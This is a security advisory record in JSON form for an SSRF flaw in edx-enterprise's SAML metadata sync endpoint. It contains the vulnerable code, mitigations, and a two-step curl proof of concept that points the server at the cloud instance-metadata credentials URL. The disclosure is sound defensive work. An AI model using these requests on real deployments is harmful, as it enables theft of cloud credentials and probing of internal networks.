{"id":"GHSA-64cv-vxpr-j6vc","summary":"edx-enterprise has SSRF via SAML metadata URL in sync_provider_data endpoint","details":"## Summary\n\nThe `sync_provider_data` endpoint in `SAMLProviderDataViewSet` fetches SAML metadata from a URL stored in `SAMLProviderConfig.metadata_source`. An authenticated user with the Enterprise Admin role can set this field to an arbitrary URL via the `SAMLProviderConfigViewSet` PATCH endpoint, then trigger a server-side HTTP request by calling `sync_provider_data`. The fetch in `fetch_metadata_xml()` passes the URL directly to `requests.get()` with no scheme enforcement, IP filtering, or timeout.\n\nThis vulnerability was introduced when the SAML admin viewsets were migrated from `openedx-platform` into `edx-enterprise`. A related fix for the equivalent fetch path in `openedx-platform` (the `fetch_saml_metadata` Celery task) was applied in [GHSA-328g-7h4g-r2m9](https://github.com/openedx/openedx-platform/security/advisories/GHSA-328g-7h4g-r2m9).\n\n## Details\n\n**Vulnerable code path:**\n\n`enterprise/api/v1/views/saml_utils.py`:\n```python\ndef fetch_metadata_xml(url):\n    log.info(\"Fetching %s\", url)\n    if not url.lower().startswith('https'):\n        log.warning(\"This SAML metadata URL is not secure! (%s)\", url)\n    response = requests.get(url, verify=True)  # No IP/scheme validation\n    response.raise_for_status()\n```\n\n`enterprise/api/v1/views/saml_provider_data.py`:\n```python\n@action(detail=False, methods=['post'], url_path='sync_provider_data')\ndef sync_provider_data(self, request):\n    ...\n    metadata_url = saml_provider.metadata_source  # set via SAMLProviderConfig PATCH\n    xml = fetch_metadata_xml(metadata_url)        # triggers the fetch\n```\n\n**Missing protections:**\n- No HTTPS enforcement (HTTP is allowed; the warning is not enforced)\n- No blocking of loopback (`127.0.0.0/8`) or link-local (`169.254.0.0/16`) ranges\n- No blocking of RFC 1918 private ranges\n- No request timeout\n\n## Proof of Concept\n\n**Prerequisites:** Authenticated user with `Enterprise Admin` role for any enterprise customer with a configured SAML Identity Provider.\n\n**Step 1:** Set a malicious metadata URL via the provider config endpoint:\n```bash\ncurl -X PATCH 'https://\u003cinstance\u003e/auth/saml/v0/provider_config/\u003cpk\u003e/' \\\n  -H 'Authorization: Bearer \u003cJWT\u003e' \\\n  -H 'Content-Type: application/json' \\\n  -d '{\"metadata_source\": \"http://169.254.169.254/latest/meta-data/iam/security-credentials/\"}'\n```\n\n**Step 2:** Trigger the server-side fetch:\n```bash\ncurl -X POST 'https://\u003cinstance\u003e/auth/saml/v0/provider_data/sync_provider_data' \\\n  -H 'Authorization: Bearer \u003cJWT\u003e' \\\n  -H 'Content-Type: application/json' \\\n  -d '{\"enterprise_customer_uuid\": \"\u003cuuid\u003e\"}'\n```\n\nThe server fetches the AWS metadata endpoint. Even though XML parsing will fail, the HTTP request is made and timing/error differences confirm reachability of internal addresses.\n\n## Impact\n\nAn Enterprise Admin can use this SSRF to:\n\n- **Steal cloud credentials:** Access AWS/GCP/Azure instance metadata services to retrieve IAM temporary credentials, potentially enabling full cloud infrastructure compromise.\n- **Scan internal networks:** Probe internal hosts, ports, and services behind the deployment's firewall.\n- **Access internal APIs:** Reach databases, admin panels, or microservices not exposed to the internet.\n\nEnterprise Admin is a delegated role typically granted to corporate training managers, not platform operators. It should not grant the ability to make the server issue arbitrary outbound HTTP requests.\n\n## Patches / Mitigations\n\nCall `validate_saml_metadata_url()` (importable from `common.djangoapps.third_party_auth.utils` as of the openedx-platform fix in [GHSA-328g-7h4g-r2m9](https://github.com/openedx/openedx-platform/security/advisories/GHSA-328g-7h4g-r2m9)) in `fetch_metadata_xml()` before calling `requests.get()`. A request timeout should also be added.\n\nOperators should additionally enforce network-level egress filtering to block outbound connections from the Open edX server to `169.254.0.0/16` and RFC 1918 ranges as a complementary control, particularly to cover hostname-based URLs that cannot be validated at the application layer.","aliases":["CVE-2026-42860","PYSEC-2026-58"],"modified":"2026-05-20T08:11:34.385019666Z","published":"2026-05-05T17:51:50Z","database_specific":{"github_reviewed":true,"github_reviewed_at":"2026-05-05T17:51:50Z","cwe_ids":["CWE-918"],"severity":"HIGH","nvd_published_at":"2026-05-11T18:16:36Z"},"references":[{"type":"WEB","url":"https://github.com/openedx/edx-enterprise/security/advisories/GHSA-64cv-vxpr-j6vc"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42860"},{"type":"PACKAGE","url":"https://github.com/openedx/edx-enterprise"}],"affected":[{"package":{"name":"edx-enterprise","ecosystem":"PyPI","purl":"pkg:pypi/edx-enterprise"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"7.0.2"},{"fixed":"7.0.5"}]}],"versions":["7.0.2","7.0.3","7.0.4"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-64cv-vxpr-j6vc/GHSA-64cv-vxpr-j6vc.json","last_known_affected_version_range":"\u003c= 7.0.4"}}],"schema_version":"1.7.5","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N"}]}